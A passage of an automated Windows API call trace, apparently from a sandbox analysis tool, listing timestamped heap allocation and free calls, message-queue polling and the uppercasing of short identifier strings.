lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0198.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0198.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0198.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0198.845] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0198.845] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0198.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0198.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0198.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0198.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0198.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0198.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0198.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0198.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0198.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0198.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0198.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0198.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0198.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0198.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0198.846] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0198.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0198.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0198.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0198.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0198.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0198.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0198.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0198.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0198.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0198.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0198.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0198.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0198.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0198.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0198.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0198.847] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0198.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0198.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0198.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0198.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0198.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0198.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0198.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0198.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0198.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0198.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0198.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0198.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0198.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0198.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0198.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0198.848] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0198.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0198.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0198.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0198.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0198.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0198.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0198.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0198.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0198.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0198.848] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0198.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0198.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0198.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0198.849] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.849] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0198.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0198.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.849] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0198.849] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0198.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0198.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0198.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0198.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0198.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.849] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0198.849] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.849] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0198.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0198.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.850] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0198.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.850] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0198.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0198.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0198.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0198.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0198.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.850] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0198.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0198.850] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0198.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0198.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0198.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0198.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0198.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0198.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0198.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0198.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0198.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0198.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.851] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0198.851] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.851] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0198.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0198.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.851] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0198.851] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0198.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0198.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0198.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0198.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0198.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.852] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0198.852] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0198.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0198.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0198.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0198.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.852] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0198.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0198.853] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0198.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0198.853] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.853] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0198.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.853] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0198.853] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.853] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0198.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0198.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0198.853] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0198.853] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0198.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0198.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0198.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0198.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0198.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0198.854] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0198.854] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0198.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0198.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0198.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0198.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0198.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0198.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0198.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0198.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0198.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0198.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0198.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0198.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0198.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0198.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0198.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 